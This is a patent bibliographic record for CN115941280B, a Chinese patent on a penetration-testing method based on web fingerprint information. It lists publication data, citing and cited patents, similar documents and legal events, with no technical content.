| CN202211408295.7A CN115941280B (en) | 2022-11-10 | 2022-11-10 | Penetration method, device, equipment and medium based on web fingerprint information |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN115941280A CN115941280A (en) | 2023-04-07 |
| CN115941280B true CN115941280B (en) | 2024-01-26 |
Family
ID=86655150
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN202211408295.7A Active CN115941280B (en) | 2022-11-10 | 2022-11-10 | Penetration method, device, equipment and medium based on web fingerprint information |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN115941280B (en) |
Families Citing this family (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN117312707A (en) * | 2023-09-05 | 2023-12-29 | 东南大学 | Website fingerprint generation method based on dynamic and static feature combination |
Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN110765333A (en) * | 2019-08-14 | 2020-02-07 | 奇安信科技集团股份有限公司 | Method and device for collecting website information, storage medium and electronic device |
| CN110879891A (en) * | 2019-08-14 | 2020-03-13 | 奇安信科技集团股份有限公司 | Vulnerability detection method and device based on web fingerprint information |
| CN111131236A (en) * | 2019-12-23 | 2020-05-08 | 杭州安恒信息技术股份有限公司 | Web fingerprint detection device, method, equipment and medium |
| CN114036059A (en) * | 2021-11-17 | 2022-02-11 | 南方电网调峰调频发电有限公司 | Automatic penetration testing system and method for power grid system and computer equipment |
| CN114528457A (en) * | 2021-12-31 | 2022-05-24 | 北京邮电大学 | Web fingerprint detection method and related equipment |
| CN114666104A (en) * | 2022-03-09 | 2022-06-24 | 国能信息技术有限公司 | Penetration testing method, system, computer equipment and storage medium |
Family Cites Families (1)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US10547628B2 (en) * | 2016-05-06 | 2020-01-28 | Sitelock, Llc | Security weakness and infiltration detection and repair in obfuscated website content |
-
2022
- 2022-11-10 CN CN202211408295.7A patent/CN115941280B/en active Active
Patent Citations (6)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN110765333A (en) * | 2019-08-14 | 2020-02-07 | 奇安信科技集团股份有限公司 | Method and device for collecting website information, storage medium and electronic device |
| CN110879891A (en) * | 2019-08-14 | 2020-03-13 | 奇安信科技集团股份有限公司 | Vulnerability detection method and device based on web fingerprint information |
| CN111131236A (en) * | 2019-12-23 | 2020-05-08 | 杭州安恒信息技术股份有限公司 | Web fingerprint detection device, method, equipment and medium |
| CN114036059A (en) * | 2021-11-17 | 2022-02-11 | 南方电网调峰调频发电有限公司 | Automatic penetration testing system and method for power grid system and computer equipment |
| CN114528457A (en) * | 2021-12-31 | 2022-05-24 | 北京邮电大学 | Web fingerprint detection method and related equipment |
| CN114666104A (en) * | 2022-03-09 | 2022-06-24 | 国能信息技术有限公司 | Penetration testing method, system, computer equipment and storage medium |
Also Published As
| Publication number | Publication date |
|---|---|
| CN115941280A (en) | 2023-04-07 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| Scheitle et al. | A long way to the top: Significance, structure, and stability of internet top lists | |
| Pearce et al. | Global measurement of {DNS} manipulation | |
| US11290468B2 (en) | Content delivery network (CDN) bot detection using primitive and compound feature sets | |
| Singh et al. | Detecting bot-infected machines using DNS fingerprinting | |
| US9426171B1 (en) | Detecting network attacks based on network records | |
| US9473516B1 (en) | Detecting network attacks based on a hash | |
| EP3123696B1 (en) | Serving approved resources | |
| Kondracki et al. | Catching transparent phish: Analyzing and detecting mitm phishing toolkits | |
| Starov et al. | Betrayed by your dashboard: Discovering malicious campaigns via web analytics | |
| WO2020041137A1 (en) | Nonce injection and observation system for detecting eavesdroppers | |
| US10931688B2 (en) | Malicious website discovery using web analytics identifiers | |
| CN115941280B (en) | Penetration method, device, equipment and medium based on web fingerprint information | |
| Matic et al. | Pythia: a framework for the automated analysis of web hosting environments | |
| CN111953638B (en) | Network attack behavior detection method and device and readable storage medium | |
| Seifert et al. | Identification of malicious web pages through analysis of underlying dns and web server relationships | |
| US11582226B2 (en) | Malicious website discovery using legitimate third party identifiers | |
| Tatang et al. | Large-scale analysis of infrastructure-leaking DNS servers | |
| Ververis et al. | Understanding internet censorship in Europe: The case of Spain | |
| Munir et al. | CookieGraph: Understanding and Detecting First-Party Tracking Cookies | |
| Kondracki et al. | The droid is in the details: Environment-aware evasion of android sandboxes | |
| Di Tizio et al. | Pareto-optimal defenses for the web infrastructure: Theory and practice | |
| Quinkert et al. | Dorkpot: A honeypotbased analysis of google dorks | |
| Hageman et al. | Gollector: Measuring Domain Name Dark Matter from Different Vantage Points | |
| Jayaprakash et al. | A Novel Framework For Detecting Subdomain State Against Takeover Attacks | |
| Barron | Addressing the Imbalance between Attackers and Defenders Using Cyber Deception |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |